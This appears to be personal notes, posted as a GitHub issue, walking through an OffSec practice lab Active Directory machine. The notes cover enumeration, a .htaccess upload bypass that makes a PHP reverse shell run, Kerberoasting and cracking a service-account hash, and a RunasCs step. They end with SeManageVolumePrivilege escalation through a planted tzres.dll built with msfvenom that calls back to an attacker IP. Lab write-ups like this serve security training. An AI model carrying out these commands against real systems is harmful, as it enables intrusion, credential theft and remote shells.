Open WDavid404 opened 1 month ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
88/tcp open kerberos-sec? syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl? syn-ack ttl 125
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open unknown syn-ack ttl 125
49668/tcp open unknown syn-ack ttl 125
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open unknown syn-ack ttl 125
49677/tcp open unknown syn-ack ttl 125
49704/tcp open unknown syn-ack ttl 125
49795/tcp open unknown syn-ack ttl 125
dig axfr @192.168.211.187 -->
; <<>> DiG 9.19.21-1+b1-Debian <<>> axfr @192.168.211.187
; (1 server found)
;; global options: +cmd
. 85731 IN NS h.root-servers.net.
. 85731 IN NS d.root-servers.net.
. 85731 IN NS a.root-servers.net.
. 85731 IN NS l.root-servers.net.
. 85731 IN NS g.root-servers.net.
. 85731 IN NS c.root-servers.net.
. 85731 IN NS i.root-servers.net.
. 85731 IN NS e.root-servers.net.
. 85731 IN NS j.root-servers.net.
. 85731 IN NS m.root-servers.net.
. 85731 IN NS k.root-servers.net.
. 85731 IN NS b.root-servers.net.
. 85731 IN NS f.root-servers.net.
h.root-servers.net. 86399 IN A 198.97.190.53
f.root-servers.net. 85731 IN A 192.5.5.241
;; Query time: 96 msec
;; SERVER: 192.168.211.187#53(192.168.211.187) (UDP)
;; WHEN: Wed Aug 07 20:47:57 EDT 2024
;; MSG SIZE rcvd: 284
no info
ldapsearch -H ldap://192.168.211.187 -x -s base namingcontexts
-->
dn:
namingcontexts: DC=access,DC=offsec
namingcontexts: CN=Configuration,DC=access,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=access,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=access,DC=offsec
ldapsearch -H ldap://192.168.211.187 -x -b"DC=access,DC=offsec"
source code --> TheEvent - v4.6.0
ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.221.187/FUZZ --> no info
Click "Send Message" button
Buy ticket Try uploading a php file
upload file with php.gif extension we can found this file on /uploads/ but we cannot execute it.
After some try, found that apart from known script extensions like ".php" and ".php4", I was able to upload files with my own extension such as ".xxx". But the server didn't render the shell at all for unknown extension, it just printed out the source code.
Solution: The server is apache. So we could potentially upload a ".htaccess" file to the directory to let the server render my ".xxx" extension as PHP script. Refer to video (https://www.youtube.com/watch?v=xZd1JWmLGLk)
echo "AddType application/x-httpd-php .xxx" > .htaccess
and upload .htaccess
change the reverse shell php (Ivan Sincek) from .php to .xxx, and upload it
Access /uploads/
it’s an Active Directory machine, we could look for some AD credentials…or we could make some.
We will start by getting a Service Principal Name. Use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)
Now that we have the SPN, we are able to request a ticket and store it in memory with the end goal of getting it’s hash. To request the ticket, two commands can be executed to request and store the ticket in the memory.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'
Extracting the hash can also be done with a handy Powershell Empire script that engages Kerberos. [kali]wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ascii hashes.txt
crack the hash
hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt
--> trustno1
--> didn't work
We should use runas script.. https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1 (RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials.)
Import-Module ./Invoke-RunasCs.ps1
at first.
Try it : Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
[kali]msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=445 -f exe > shell.exe
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:/users/public/shell.exe"
Use this tool (SeManageVolumeExploit.exe) for SeManageVolumePrivilege
Now we can write to the C: drive.
The general idea is that the attacker can leverage this particular privilege with the exploitation to get full control over "C:\", and then it can craft a ".dll" file and place it in somewhere "C:\Windows\System32\" to trigger the payload as root.
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll
place a DLL as C:\Windows\System32\wbem\tzres.dll and then run systeminfo
command
--> we can get a reverse shell.
The community has rated it ‘Very Hard’.
Keypoints:
For apache server, we can upload .htaccess file to define our file extention
echo "AddType application/x-httpd-php .xxx" > .htaccess
Get a Service Principal Name --> Use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)
Invoke Kerberaost
Runas script https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1
[PE]SeManageVolumePrivilege --> use SeManageVolumeExploit.exe SeManageVolumeExploit.exe let us have full control over C:/ --> we made a dll named tzres.dll
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll
place a DLL asC:\Windows\System32\wbem\tzres.dll
--> then run "systeminfo" command --> tzres.dll will be loaded so we can get reverse shell as administartor.